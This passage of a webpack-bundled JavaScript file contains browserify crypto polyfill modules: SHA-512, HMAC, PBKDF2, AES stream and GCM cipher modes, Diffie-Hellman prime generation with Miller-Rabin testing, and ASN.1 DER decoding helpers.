
function Gamma0l (x, xl) {
  return (x >>> 1 | xl << 31) ^ (x >>> 8 | xl << 24) ^ (x >>> 7 | xl << 25)
}

function Gamma1 (x, xl) {
  return (x >>> 19 | xl << 13) ^ (xl >>> 29 | x << 3) ^ (x >>> 6)
}

function Gamma1l (x, xl) {
  return (x >>> 19 | xl << 13) ^ (xl >>> 29 | x << 3) ^ (x >>> 6 | xl << 26)
}

function getCarry (a, b) {
  return (a >>> 0) < (b >>> 0) ? 1 : 0
}

Sha512.prototype._update = function (M) {
  var W = this._w

  var ah = this._ah | 0
  var bh = this._bh | 0
  var ch = this._ch | 0
  var dh = this._dh | 0
  var eh = this._eh | 0
  var fh = this._fh | 0
  var gh = this._gh | 0
  var hh = this._hh | 0

  var al = this._al | 0
  var bl = this._bl | 0
  var cl = this._cl | 0
  var dl = this._dl | 0
  var el = this._el | 0
  var fl = this._fl | 0
  var gl = this._gl | 0
  var hl = this._hl | 0

  for (var i = 0; i < 32; i += 2) {
    W[i] = M.readInt32BE(i * 4)
    W[i + 1] = M.readInt32BE(i * 4 + 4)
  }
  for (; i < 160; i += 2) {
    var xh = W[i - 15 * 2]
    var xl = W[i - 15 * 2 + 1]
    var gamma0 = Gamma0(xh, xl)
    var gamma0l = Gamma0l(xl, xh)

    xh = W[i - 2 * 2]
    xl = W[i - 2 * 2 + 1]
    var gamma1 = Gamma1(xh, xl)
    var gamma1l = Gamma1l(xl, xh)

    // W[i] = gamma0 + W[i - 7] + gamma1 + W[i - 16]
    var Wi7h = W[i - 7 * 2]
    var Wi7l = W[i - 7 * 2 + 1]

    var Wi16h = W[i - 16 * 2]
    var Wi16l = W[i - 16 * 2 + 1]

    var Wil = (gamma0l + Wi7l) | 0
    var Wih = (gamma0 + Wi7h + getCarry(Wil, gamma0l)) | 0
    Wil = (Wil + gamma1l) | 0
    Wih = (Wih + gamma1 + getCarry(Wil, gamma1l)) | 0
    Wil = (Wil + Wi16l) | 0
    Wih = (Wih + Wi16h + getCarry(Wil, Wi16l)) | 0

    W[i] = Wih
    W[i + 1] = Wil
  }

  for (var j = 0; j < 160; j += 2) {
    Wih = W[j]
    Wil = W[j + 1]

    var majh = maj(ah, bh, ch)
    var majl = maj(al, bl, cl)

    var sigma0h = sigma0(ah, al)
    var sigma0l = sigma0(al, ah)
    var sigma1h = sigma1(eh, el)
    var sigma1l = sigma1(el, eh)

    // t1 = h + sigma1 + ch + K[j] + W[j]
    var Kih = K[j]
    var Kil = K[j + 1]

    var chh = Ch(eh, fh, gh)
    var chl = Ch(el, fl, gl)

    var t1l = (hl + sigma1l) | 0
    var t1h = (hh + sigma1h + getCarry(t1l, hl)) | 0
    t1l = (t1l + chl) | 0
    t1h = (t1h + chh + getCarry(t1l, chl)) | 0
    t1l = (t1l + Kil) | 0
    t1h = (t1h + Kih + getCarry(t1l, Kil)) | 0
    t1l = (t1l + Wil) | 0
    t1h = (t1h + Wih + getCarry(t1l, Wil)) | 0

    // t2 = sigma0 + maj
    var t2l = (sigma0l + majl) | 0
    var t2h = (sigma0h + majh + getCarry(t2l, sigma0l)) | 0

    hh = gh
    hl = gl
    gh = fh
    gl = fl
    fh = eh
    fl = el
    el = (dl + t1l) | 0
    eh = (dh + t1h + getCarry(el, dl)) | 0
    dh = ch
    dl = cl
    ch = bh
    cl = bl
    bh = ah
    bl = al
    al = (t1l + t2l) | 0
    ah = (t1h + t2h + getCarry(al, t1l)) | 0
  }

  this._al = (this._al + al) | 0
  this._bl = (this._bl + bl) | 0
  this._cl = (this._cl + cl) | 0
  this._dl = (this._dl + dl) | 0
  this._el = (this._el + el) | 0
  this._fl = (this._fl + fl) | 0
  this._gl = (this._gl + gl) | 0
  this._hl = (this._hl + hl) | 0

  this._ah = (this._ah + ah + getCarry(this._al, al)) | 0
  this._bh = (this._bh + bh + getCarry(this._bl, bl)) | 0
  this._ch = (this._ch + ch + getCarry(this._cl, cl)) | 0
  this._dh = (this._dh + dh + getCarry(this._dl, dl)) | 0
  this._eh = (this._eh + eh + getCarry(this._el, el)) | 0
  this._fh = (this._fh + fh + getCarry(this._fl, fl)) | 0
  this._gh = (this._gh + gh + getCarry(this._gl, gl)) | 0
  this._hh = (this._hh + hh + getCarry(this._hl, hl)) | 0
}

Sha512.prototype._hash = function () {
  var H = Buffer.allocUnsafe(64)

  function writeInt64BE (h, l, offset) {
    H.writeInt32BE(h, offset)
    H.writeInt32BE(l, offset + 4)
  }

  writeInt64BE(this._ah, this._al, 0)
  writeInt64BE(this._bh, this._bl, 8)
  writeInt64BE(this._ch, this._cl, 16)
  writeInt64BE(this._dh, this._dl, 24)
  writeInt64BE(this._eh, this._el, 32)
  writeInt64BE(this._fh, this._fl, 40)
  writeInt64BE(this._gh, this._gl, 48)
  writeInt64BE(this._hh, this._hl, 56)

  return H
}

module.exports = Sha512


/***/ }),
/* 1241 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";

var inherits = __webpack_require__(25)
var Legacy = __webpack_require__(2677)
var Base = __webpack_require__(201)
var Buffer = __webpack_require__(41).Buffer
var md5 = __webpack_require__(1242)
var RIPEMD160 = __webpack_require__(689)

var sha = __webpack_require__(690)

var ZEROS = Buffer.alloc(128)

function Hmac (alg, key) {
  Base.call(this, 'digest')
  if (typeof key === 'string') {
    key = Buffer.from(key)
  }

  var blocksize = (alg === 'sha512' || alg === 'sha384') ? 128 : 64

  this._alg = alg
  this._key = key
  if (key.length > blocksize) {
    var hash = alg === 'rmd160' ? new RIPEMD160() : sha(alg)
    key = hash.update(key).digest()
  } else if (key.length < blocksize) {
    key = Buffer.concat([key, ZEROS], blocksize)
  }

  var ipad = this._ipad = Buffer.allocUnsafe(blocksize)
  var opad = this._opad = Buffer.allocUnsafe(blocksize)

  for (var i = 0; i < blocksize; i++) {
    ipad[i] = key[i] ^ 0x36
    opad[i] = key[i] ^ 0x5C
  }
  this._hash = alg === 'rmd160' ? new RIPEMD160() : sha(alg)
  this._hash.update(ipad)
}

inherits(Hmac, Base)

Hmac.prototype._update = function (data) {
  this._hash.update(data)
}

Hmac.prototype._final = function () {
  var h = this._hash.digest()
  var hash = this._alg === 'rmd160' ? new RIPEMD160() : sha(this._alg)
  return hash.update(this._opad).update(h).digest()
}

module.exports = function createHmac (alg, key) {
  alg = alg.toLowerCase()
  if (alg === 'rmd160' || alg === 'ripemd160') {
    return new Hmac('rmd160', key)
  }
  if (alg === 'md5') {
    return new Legacy(md5, key)
  }
  return new Hmac(alg, key)
}


/***/ }),
/* 1242 */
/***/ (function(module, exports, __webpack_require__) {

var MD5 = __webpack_require__(684)

module.exports = function (buffer) {
  return new MD5().update(buffer).digest()
}


/***/ }),
/* 1243 */
/***/ (function(module, exports) {

module.exports = {"sha224WithRSAEncryption":{"sign":"rsa","hash":"sha224","id":"302d300d06096086480165030402040500041c"},"RSA-SHA224":{"sign":"ecdsa/rsa","hash":"sha224","id":"302d300d06096086480165030402040500041c"},"sha256WithRSAEncryption":{"sign":"rsa","hash":"sha256","id":"3031300d060960864801650304020105000420"},"RSA-SHA256":{"sign":"ecdsa/rsa","hash":"sha256","id":"3031300d060960864801650304020105000420"},"sha384WithRSAEncryption":{"sign":"rsa","hash":"sha384","id":"3041300d060960864801650304020205000430"},"RSA-SHA384":{"sign":"ecdsa/rsa","hash":"sha384","id":"3041300d060960864801650304020205000430"},"sha512WithRSAEncryption":{"sign":"rsa","hash":"sha512","id":"3051300d060960864801650304020305000440"},"RSA-SHA512":{"sign":"ecdsa/rsa","hash":"sha512","id":"3051300d060960864801650304020305000440"},"RSA-SHA1":{"sign":"rsa","hash":"sha1","id":"3021300906052b0e03021a05000414"},"ecdsa-with-SHA1":{"sign":"ecdsa","hash":"sha1","id":""},"sha256":{"sign":"ecdsa","hash":"sha256","id":""},"sha224":{"sign":"ecdsa","hash":"sha224","id":""},"sha384":{"sign":"ecdsa","hash":"sha384","id":""},"sha512":{"sign":"ecdsa","hash":"sha512","id":""},"DSA-SHA":{"sign":"dsa","hash":"sha1","id":""},"DSA-SHA1":{"sign":"dsa","hash":"sha1","id":""},"DSA":{"sign":"dsa","hash":"sha1","id":""},"DSA-WITH-SHA224":{"sign":"dsa","hash":"sha224","id":""},"DSA-SHA224":{"sign":"dsa","hash":"sha224","id":""},"DSA-WITH-SHA256":{"sign":"dsa","hash":"sha256","id":""},"DSA-SHA256":{"sign":"dsa","hash":"sha256","id":""},"DSA-WITH-SHA384":{"sign":"dsa","hash":"sha384","id":""},"DSA-SHA384":{"sign":"dsa","hash":"sha384","id":""},"DSA-WITH-SHA512":{"sign":"dsa","hash":"sha512","id":""},"DSA-SHA512":{"sign":"dsa","hash":"sha512","id":""},"DSA-RIPEMD160":{"sign":"dsa","hash":"rmd160","id":""},"ripemd160WithRSA":{"sign":"rsa","hash":"rmd160","id":"3021300906052b2403020105000414"},"RSA-RIPEMD160":{"sign":"rsa","hash":"rmd160","id":"3021300906052b2403020105000414"},"md5WithRSAEncryption":{"sign":"rsa","hash":"md5","id":"3020300c06082a864886f70d020505000410"},"RSA-MD5":{"sign":"rsa","hash":"md5","id":"3020300c06082a864886f70d020505000410"}}

/***/ }),
/* 1244 */
/***/ (function(module, exports, __webpack_require__) {

exports.pbkdf2 = __webpack_require__(2679)
exports.pbkdf2Sync = __webpack_require__(1247)


/***/ }),
/* 1245 */
/***/ (function(module, exports, __webpack_require__) {

/* WEBPACK VAR INJECTION */(function(Buffer) {var MAX_ALLOC = Math.pow(2, 30) - 1 // default in iojs

function checkBuffer (buf, name) {
  if (typeof buf !== 'string' && !Buffer.isBuffer(buf)) {
    throw new TypeError(name + ' must be a buffer or string')
  }
}

module.exports = function (password, salt, iterations, keylen) {
  checkBuffer(password, 'Password')
  checkBuffer(salt, 'Salt')

  if (typeof iterations !== 'number') {
    throw new TypeError('Iterations not a number')
  }

  if (iterations < 0) {
    throw new TypeError('Bad iterations')
  }

  if (typeof keylen !== 'number') {
    throw new TypeError('Key length not a number')
  }

  if (keylen < 0 || keylen > MAX_ALLOC || keylen !== keylen) { /* eslint no-self-compare: 0 */
    throw new TypeError('Bad key length')
  }
}

/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(43).Buffer))

/***/ }),
/* 1246 */
/***/ (function(module, exports, __webpack_require__) {

/* WEBPACK VAR INJECTION */(function(process) {var defaultEncoding
/* istanbul ignore next */
if (process.browser) {
  defaultEncoding = 'utf-8'
} else {
  var pVersionMajor = parseInt(process.version.split('.')[0].slice(1), 10)

  defaultEncoding = pVersionMajor >= 6 ? 'utf-8' : 'binary'
}
module.exports = defaultEncoding

/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(83)))

/***/ }),
/* 1247 */
/***/ (function(module, exports, __webpack_require__) {

var md5 = __webpack_require__(1242)
var RIPEMD160 = __webpack_require__(689)
var sha = __webpack_require__(690)

var checkParameters = __webpack_require__(1245)
var defaultEncoding = __webpack_require__(1246)
var Buffer = __webpack_require__(41).Buffer
var ZEROS = Buffer.alloc(128)
var sizes = {
  md5: 16,
  sha1: 20,
  sha224: 28,
  sha256: 32,
  sha384: 48,
  sha512: 64,
  rmd160: 20,
  ripemd160: 20
}

function Hmac (alg, key, saltLen) {
  var hash = getDigest(alg)
  var blocksize = (alg === 'sha512' || alg === 'sha384') ? 128 : 64

  if (key.length > blocksize) {
    key = hash(key)
  } else if (key.length < blocksize) {
    key = Buffer.concat([key, ZEROS], blocksize)
  }

  var ipad = Buffer.allocUnsafe(blocksize + sizes[alg])
  var opad = Buffer.allocUnsafe(blocksize + sizes[alg])
  for (var i = 0; i < blocksize; i++) {
    ipad[i] = key[i] ^ 0x36
    opad[i] = key[i] ^ 0x5C
  }

  var ipad1 = Buffer.allocUnsafe(blocksize + saltLen + 4)
  ipad.copy(ipad1, 0, 0, blocksize)
  this.ipad1 = ipad1
  this.ipad2 = ipad
  this.opad = opad
  this.alg = alg
  this.blocksize = blocksize
  this.hash = hash
  this.size = sizes[alg]
}

Hmac.prototype.run = function (data, ipad) {
  data.copy(ipad, this.blocksize)
  var h = this.hash(ipad)
  h.copy(this.opad, this.blocksize)
  return this.hash(this.opad)
}

function getDigest (alg) {
  function shaFunc (data) {
    return sha(alg).update(data).digest()
  }
  function rmd160Func (data) {
    return new RIPEMD160().update(data).digest()
  }

  if (alg === 'rmd160' || alg === 'ripemd160') return rmd160Func
  if (alg === 'md5') return md5
  return shaFunc
}

function pbkdf2 (password, salt, iterations, keylen, digest) {
  checkParameters(password, salt, iterations, keylen)

  if (!Buffer.isBuffer(password)) password = Buffer.from(password, defaultEncoding)
  if (!Buffer.isBuffer(salt)) salt = Buffer.from(salt, defaultEncoding)

  digest = digest || 'sha1'

  var hmac = new Hmac(digest, password, salt.length)

  var DK = Buffer.allocUnsafe(keylen)
  var block1 = Buffer.allocUnsafe(salt.length + 4)
  salt.copy(block1, 0, 0, salt.length)

  var destPos = 0
  var hLen = sizes[digest]
  var l = Math.ceil(keylen / hLen)

  for (var i = 1; i <= l; i++) {
    block1.writeUInt32BE(i, salt.length)

    var T = hmac.run(block1, hmac.ipad1)
    var U = T

    for (var j = 1; j < iterations; j++) {
      U = hmac.run(U, hmac.ipad2)
      for (var k = 0; k < hLen; k++) T[k] ^= U[k]
    }

    T.copy(DK, destPos)
    destPos += hLen
  }

  return DK
}

module.exports = pbkdf2


/***/ }),
/* 1248 */
/***/ (function(module, exports, __webpack_require__) {

var xor = __webpack_require__(349)
var Buffer = __webpack_require__(41).Buffer
var incr32 = __webpack_require__(1249)

function getBlock (self) {
  var out = self._cipher.encryptBlockRaw(self._prev)
  incr32(self._prev)
  return out
}

var blockSize = 16
exports.encrypt = function (self, chunk) {
  var chunkNum = Math.ceil(chunk.length / blockSize)
  var start = self._cache.length
  self._cache = Buffer.concat([
    self._cache,
    Buffer.allocUnsafe(chunkNum * blockSize)
  ])
  for (var i = 0; i < chunkNum; i++) {
    var out = getBlock(self)
    var offset = start + i * blockSize
    self._cache.writeUInt32BE(out[0], offset + 0)
    self._cache.writeUInt32BE(out[1], offset + 4)
    self._cache.writeUInt32BE(out[2], offset + 8)
    self._cache.writeUInt32BE(out[3], offset + 12)
  }
  var pad = self._cache.slice(0, chunk.length)
  self._cache = self._cache.slice(chunk.length)
  return xor(chunk, pad)
}


/***/ }),
/* 1249 */
/***/ (function(module, exports) {

function incr32 (iv) {
  var len = iv.length
  var item
  while (len--) {
    item = iv.readUInt8(len)
    if (item === 255) {
      iv.writeUInt8(0, len)
    } else {
      item++
      iv.writeUInt8(item, len)
      break
    }
  }
}
module.exports = incr32


/***/ }),
/* 1250 */
/***/ (function(module, exports) {

module.exports = {"aes-128-ecb":{"cipher":"AES","key":128,"iv":0,"mode":"ECB","type":"block"},"aes-192-ecb":{"cipher":"AES","key":192,"iv":0,"mode":"ECB","type":"block"},"aes-256-ecb":{"cipher":"AES","key":256,"iv":0,"mode":"ECB","type":"block"},"aes-128-cbc":{"cipher":"AES","key":128,"iv":16,"mode":"CBC","type":"block"},"aes-192-cbc":{"cipher":"AES","key":192,"iv":16,"mode":"CBC","type":"block"},"aes-256-cbc":{"cipher":"AES","key":256,"iv":16,"mode":"CBC","type":"block"},"aes128":{"cipher":"AES","key":128,"iv":16,"mode":"CBC","type":"block"},"aes192":{"cipher":"AES","key":192,"iv":16,"mode":"CBC","type":"block"},"aes256":{"cipher":"AES","key":256,"iv":16,"mode":"CBC","type":"block"},"aes-128-cfb":{"cipher":"AES","key":128,"iv":16,"mode":"CFB","type":"stream"},"aes-192-cfb":{"cipher":"AES","key":192,"iv":16,"mode":"CFB","type":"stream"},"aes-256-cfb":{"cipher":"AES","key":256,"iv":16,"mode":"CFB","type":"stream"},"aes-128-cfb8":{"cipher":"AES","key":128,"iv":16,"mode":"CFB8","type":"stream"},"aes-192-cfb8":{"cipher":"AES","key":192,"iv":16,"mode":"CFB8","type":"stream"},"aes-256-cfb8":{"cipher":"AES","key":256,"iv":16,"mode":"CFB8","type":"stream"},"aes-128-cfb1":{"cipher":"AES","key":128,"iv":16,"mode":"CFB1","type":"stream"},"aes-192-cfb1":{"cipher":"AES","key":192,"iv":16,"mode":"CFB1","type":"stream"},"aes-256-cfb1":{"cipher":"AES","key":256,"iv":16,"mode":"CFB1","type":"stream"},"aes-128-ofb":{"cipher":"AES","key":128,"iv":16,"mode":"OFB","type":"stream"},"aes-192-ofb":{"cipher":"AES","key":192,"iv":16,"mode":"OFB","type":"stream"},"aes-256-ofb":{"cipher":"AES","key":256,"iv":16,"mode":"OFB","type":"stream"},"aes-128-ctr":{"cipher":"AES","key":128,"iv":16,"mode":"CTR","type":"stream"},"aes-192-ctr":{"cipher":"AES","key":192,"iv":16,"mode":"CTR","type":"stream"},"aes-256-ctr":{"cipher":"AES","key":256,"iv":16,"mode":"CTR","type":"stream"},"aes-128-gcm":{"cipher":"AES","key":128,"iv":12,"mode":"GCM","type":"auth"},"aes-192-gcm":{"cipher":"AES","key":192,"iv":12,"mode":"GCM","type":"auth"},"aes-256-gcm":{"cipher":"AES","key":256,"iv":12,"mode":"GCM","type":"auth"}}

/***/ }),
/* 1251 */
/***/ (function(module, exports, __webpack_require__) {

var aes = __webpack_require__(488)
var Buffer = __webpack_require__(41).Buffer
var Transform = __webpack_require__(201)
var inherits = __webpack_require__(25)
var GHASH = __webpack_require__(2694)
var xor = __webpack_require__(349)
var incr32 = __webpack_require__(1249)

function xorTest (a, b) {
  var out = 0
  if (a.length !== b.length) out++

  var len = Math.min(a.length, b.length)
  for (var i = 0; i < len; ++i) {
    out += (a[i] ^ b[i])
  }

  return out
}

function calcIv (self, iv, ck) {
  if (iv.length === 12) {
    self._finID = Buffer.concat([iv, Buffer.from([0, 0, 0, 1])])
    return Buffer.concat([iv, Buffer.from([0, 0, 0, 2])])
  }
  var ghash = new GHASH(ck)
  var len = iv.length
  var toPad = len % 16
  ghash.update(iv)
  if (toPad) {
    toPad = 16 - toPad
    ghash.update(Buffer.alloc(toPad, 0))
  }
  ghash.update(Buffer.alloc(8, 0))
  var ivBits = len * 8
  var tail = Buffer.alloc(8)
  tail.writeUIntBE(ivBits, 0, 8)
  ghash.update(tail)
  self._finID = ghash.state
  var out = Buffer.from(self._finID)
  incr32(out)
  return out
}
function StreamCipher (mode, key, iv, decrypt) {
  Transform.call(this)

  var h = Buffer.alloc(4, 0)

  this._cipher = new aes.AES(key)
  var ck = this._cipher.encryptBlock(h)
  this._ghash = new GHASH(ck)
  iv = calcIv(this, iv, ck)

  this._prev = Buffer.from(iv)
  this._cache = Buffer.allocUnsafe(0)
  this._secCache = Buffer.allocUnsafe(0)
  this._decrypt = decrypt
  this._alen = 0
  this._len = 0
  this._mode = mode

  this._authTag = null
  this._called = false
}

inherits(StreamCipher, Transform)

StreamCipher.prototype._update = function (chunk) {
  if (!this._called && this._alen) {
    var rump = 16 - (this._alen % 16)
    if (rump < 16) {
      rump = Buffer.alloc(rump, 0)
      this._ghash.update(rump)
    }
  }

  this._called = true
  var out = this._mode.encrypt(this, chunk)
  if (this._decrypt) {
    this._ghash.update(chunk)
  } else {
    this._ghash.update(out)
  }
  this._len += chunk.length
  return out
}

StreamCipher.prototype._final = function () {
  if (this._decrypt && !this._authTag) throw new Error('Unsupported state or unable to authenticate data')

  var tag = xor(this._ghash.final(this._alen * 8, this._len * 8), this._cipher.encryptBlock(this._finID))
  if (this._decrypt && xorTest(tag, this._authTag)) throw new Error('Unsupported state or unable to authenticate data')

  this._authTag = tag
  this._cipher.scrub()
}

StreamCipher.prototype.getAuthTag = function getAuthTag () {
  if (this._decrypt || !Buffer.isBuffer(this._authTag)) throw new Error('Attempting to get auth tag in unsupported state')

  return this._authTag
}

StreamCipher.prototype.setAuthTag = function setAuthTag (tag) {
  if (!this._decrypt) throw new Error('Attempting to set auth tag in unsupported state')

  this._authTag = tag
}

StreamCipher.prototype.setAAD = function setAAD (buf) {
  if (this._called) throw new Error('Attempting to set AAD in unsupported state')

  this._ghash.update(buf)
  this._alen += buf.length
}

module.exports = StreamCipher


/***/ }),
/* 1252 */
/***/ (function(module, exports, __webpack_require__) {

var aes = __webpack_require__(488)
var Buffer = __webpack_require__(41).Buffer
var Transform = __webpack_require__(201)
var inherits = __webpack_require__(25)

function StreamCipher (mode, key, iv, decrypt) {
  Transform.call(this)

  this._cipher = new aes.AES(key)
  this._prev = Buffer.from(iv)
  this._cache = Buffer.allocUnsafe(0)
  this._secCache = Buffer.allocUnsafe(0)
  this._decrypt = decrypt
  this._mode = mode
}

inherits(StreamCipher, Transform)

StreamCipher.prototype._update = function (chunk) {
  return this._mode.encrypt(this, chunk, this._decrypt)
}

StreamCipher.prototype._final = function () {
  this._cipher.scrub()
}

module.exports = StreamCipher


/***/ }),
/* 1253 */
/***/ (function(module, exports, __webpack_require__) {

var randomBytes = __webpack_require__(274);
module.exports = findPrime;
findPrime.simpleSieve = simpleSieve;
findPrime.fermatTest = fermatTest;
var BN = __webpack_require__(63);
var TWENTYFOUR = new BN(24);
var MillerRabin = __webpack_require__(1254);
var millerRabin = new MillerRabin();
var ONE = new BN(1);
var TWO = new BN(2);
var FIVE = new BN(5);
var SIXTEEN = new BN(16);
var EIGHT = new BN(8);
var TEN = new BN(10);
var THREE = new BN(3);
var SEVEN = new BN(7);
var ELEVEN = new BN(11);
var FOUR = new BN(4);
var TWELVE = new BN(12);
var primes = null;

function _getPrimes() {
  if (primes !== null)
    return primes;

  var limit = 0x100000;
  var res = [];
  res[0] = 2;
  for (var i = 1, k = 3; k < limit; k += 2) {
    var sqrt = Math.ceil(Math.sqrt(k));
    for (var j = 0; j < i && res[j] <= sqrt; j++)
      if (k % res[j] === 0)
        break;

    if (i !== j && res[j] <= sqrt)
      continue;

    res[i++] = k;
  }
  primes = res;
  return res;
}

function simpleSieve(p) {
  var primes = _getPrimes();

  for (var i = 0; i < primes.length; i++)
    if (p.modn(primes[i]) === 0) {
      if (p.cmpn(primes[i]) === 0) {
        return true;
      } else {
        return false;
      }
    }

  return true;
}

function fermatTest(p) {
  var red = BN.mont(p);
  return TWO.toRed(red).redPow(p.subn(1)).fromRed().cmpn(1) === 0;
}

function findPrime(bits, gen) {
  if (bits < 16) {
    // this is what openssl does
    if (gen === 2 || gen === 5) {
      return new BN([0x8c, 0x7b]);
    } else {
      return new BN([0x8c, 0x27]);
    }
  }
  gen = new BN(gen);

  var num, n2;

  while (true) {
    num = new BN(randomBytes(Math.ceil(bits / 8)));
    while (num.bitLength() > bits) {
      num.ishrn(1);
    }
    if (num.isEven()) {
      num.iadd(ONE);
    }
    if (!num.testn(1)) {
      num.iadd(TWO);
    }
    if (!gen.cmp(TWO)) {
      while (num.mod(TWENTYFOUR).cmp(ELEVEN)) {
        num.iadd(FOUR);
      }
    } else if (!gen.cmp(FIVE)) {
      while (num.mod(TEN).cmp(THREE)) {
        num.iadd(FOUR);
      }
    }
    n2 = num.shrn(1);
    if (simpleSieve(n2) && simpleSieve(num) &&
      fermatTest(n2) && fermatTest(num) &&
      millerRabin.test(n2) && millerRabin.test(num)) {
      return num;
    }
  }

}


/***/ }),
/* 1254 */
/***/ (function(module, exports, __webpack_require__) {

var bn = __webpack_require__(63);
var brorand = __webpack_require__(1255);

function MillerRabin(rand) {
  this.rand = rand || new brorand.Rand();
}
module.exports = MillerRabin;

MillerRabin.create = function create(rand) {
  return new MillerRabin(rand);
};

MillerRabin.prototype._randbelow = function _randbelow(n) {
  var len = n.bitLength();
  var min_bytes = Math.ceil(len / 8);

  // Generage random bytes until a number less than n is found.
  // This ensures that 0..n-1 have an equal probability of being selected.
  do
    var a = new bn(this.rand.generate(min_bytes));
  while (a.cmp(n) >= 0);

  return a;
};

MillerRabin.prototype._randrange = function _randrange(start, stop) {
  // Generate a random number greater than or equal to start and less than stop.
  var size = stop.sub(start);
  return start.add(this._randbelow(size));
};

MillerRabin.prototype.test = function test(n, k, cb) {
  var len = n.bitLength();
  var red = bn.mont(n);
  var rone = new bn(1).toRed(red);

  if (!k)
    k = Math.max(1, (len / 48) | 0);

  // Find d and s, (n - 1) = (2 ^ s) * d;
  var n1 = n.subn(1);
  for (var s = 0; !n1.testn(s); s++) {}
  var d = n.shrn(s);

  var rn1 = n1.toRed(red);

  var prime = true;
  for (; k > 0; k--) {
    var a = this._randrange(new bn(2), n1);
    if (cb)
      cb(a);

    var x = a.toRed(red).redPow(d);
    if (x.cmp(rone) === 0 || x.cmp(rn1) === 0)
      continue;

    for (var i = 1; i < s; i++) {
      x = x.redSqr();

      if (x.cmp(rone) === 0)
        return false;
      if (x.cmp(rn1) === 0)
        break;
    }

    if (i === s)
      return false;
  }

  return prime;
};

MillerRabin.prototype.getDivisor = function getDivisor(n, k) {
  var len = n.bitLength();
  var red = bn.mont(n);
  var rone = new bn(1).toRed(red);

  if (!k)
    k = Math.max(1, (len / 48) | 0);

  // Find d and s, (n - 1) = (2 ^ s) * d;
  var n1 = n.subn(1);
  for (var s = 0; !n1.testn(s); s++) {}
  var d = n.shrn(s);

  var rn1 = n1.toRed(red);

  for (; k > 0; k--) {
    var a = this._randrange(new bn(2), n1);

    var g = n.gcd(a);
    if (g.cmpn(1) !== 0)
      return g;

    var x = a.toRed(red).redPow(d);
    if (x.cmp(rone) === 0 || x.cmp(rn1) === 0)
      continue;

    for (var i = 1; i < s; i++) {
      x = x.redSqr();

      if (x.cmp(rone) === 0)
        return x.fromRed().subn(1).gcd(n);
      if (x.cmp(rn1) === 0)
        break;
    }

    if (i === s) {
      x = x.redSqr();
      return x.fromRed().subn(1).gcd(n);
    }
  }

  return false;
};


/***/ }),
/* 1255 */,
/* 1256 */,
/* 1257 */,
/* 1258 */,
/* 1259 */,
/* 1260 */
/***/ (function(module, exports, __webpack_require__) {

var inherits = __webpack_require__(25);
var Reporter = __webpack_require__(352).Reporter;
var Buffer = __webpack_require__(43).Buffer;

function DecoderBuffer(base, options) {
  Reporter.call(this, options);
  if (!Buffer.isBuffer(base)) {
    this.error('Input not Buffer');
    return;
  }

  this.base = base;
  this.offset = 0;
  this.length = base.length;
}
inherits(DecoderBuffer, Reporter);
exports.DecoderBuffer = DecoderBuffer;

DecoderBuffer.prototype.save = function save() {
  return { offset: this.offset, reporter: Reporter.prototype.save.call(this) };
};

DecoderBuffer.prototype.restore = function restore(save) {
  // Return skipped data
  var res = new DecoderBuffer(this.base);
  res.offset = save.offset;
  res.length = this.offset;

  this.offset = save.offset;
  Reporter.prototype.restore.call(this, save.reporter);

  return res;
};

DecoderBuffer.prototype.isEmpty = function isEmpty() {
  return this.offset === this.length;
};

DecoderBuffer.prototype.readUInt8 = function readUInt8(fail) {
  if (this.offset + 1 <= this.length)
    return this.base.readUInt8(this.offset++, true);
  else
    return this.error(fail || 'DecoderBuffer overrun');
}

DecoderBuffer.prototype.skip = function skip(bytes, fail) {
  if (!(this.offset + bytes <= this.length))
    return this.error(fail || 'DecoderBuffer overrun');

  var res = new DecoderBuffer(this.base);

  // Share reporter state
  res._reporterState = this._reporterState;

  res.offset = this.offset;
  res.length = this.offset + bytes;
  this.offset += bytes;
  return res;
}

DecoderBuffer.prototype.raw = function raw(save) {
  return this.base.slice(save ? save.offset : this.offset, this.length);
}

function EncoderBuffer(value, reporter) {
  if (Array.isArray(value)) {
    this.length = 0;
    this.value = value.map(function(item) {
      if (!(item instanceof EncoderBuffer))
        item = new EncoderBuffer(item, reporter);
      this.length += item.length;
      return item;
    }, this);
  } else if (typeof value === 'number') {
    if (!(0 <= value && value <= 0xff))
      return reporter.error('non-byte EncoderBuffer value');
    this.value = value;
    this.length = 1;
  } else if (typeof value === 'string') {
    this.value = value;
    this.length = Buffer.byteLength(value);
  } else if (Buffer.isBuffer(value)) {
    this.value = value;
    this.length = value.length;
  } else {
    return reporter.error('Unsupported type: ' + typeof value);
  }
}
exports.EncoderBuffer = EncoderBuffer;

EncoderBuffer.prototype.join = function join(out, offset) {
  if (!out)
    out = new Buffer(this.length);
  if (!offset)
    offset = 0;

  if (this.length === 0)
    return out;

  if (Array.isArray(this.value)) {
    this.value.forEach(function(item) {
      item.join(out, offset);
      offset += item.length;
    });
  } else {
    if (typeof this.value === 'number')
      out[offset] = this.value;
    else if (typeof this.value === 'string')
      out.write(this.value, offset);
    else if (Buffer.isBuffer(this.value))
      this.value.copy(out, offset);
    offset += this.length;
  }

  return out;
};


/***/ }),
/* 1261 */
/***/ (function(module, exports, __webpack_require__) {

var constants = exports;

// Helper
constants._reverse = function reverse(map) {
  var res = {};

  Object.keys(map).forEach(function(key) {
    // Convert key to integer if it is stringified
    if ((key | 0) == key)
      key = key | 0;

    var value = map[key];
    res[value] = key;
  });

  return res;
};

constants.der = __webpack_require__(2732);


/***/ }),
/* 1262 */
/***/ (function(module, exports, __webpack_require__) {

var inherits = __webpack_require__(25);

var asn1 = __webpack_require__(351);
var base = asn1.base;
var bignum = asn1.bignum;

// Import DER constants
var der = asn1.constants.der;

function DERDecoder(entity) {
  this.enc = 'der';
  this.name = entity.name;
  this.entity = entity;

  // Construct base tree
  this.tree = new DERNode();
  this.tree._init(entity.body);
};
module.exports = DERDecoder;

DERDecoder.prototype.decode = function decode(data, options) {
  if (!(data instanceof base.DecoderBuffer))
    data = new base.DecoderBuffer(data, options);

  return this.tree._decode(data, options);
};

// Tree methods

function DERNode(parent) {
  base.Node.call(this, 'der', parent);
}
inherits(DERNode, base.Node);

DERNode.prototype._peekTag = function peekTag(buffer, tag, any) {
  if (buffer.isEmpty())
    return false;

  var state = buffer.save();
  var decodedTag = derDecodeTag(buffer, 'Failed to peek tag: "' + tag + '"');
  if (buffer.isError(decodedTag))
    return decodedTag;

  buffer.restore(state);

  return decodedTag.tag === tag || decodedTag.tagStr === tag ||
    (decodedTag.tagStr + 'of') === tag || any;
};

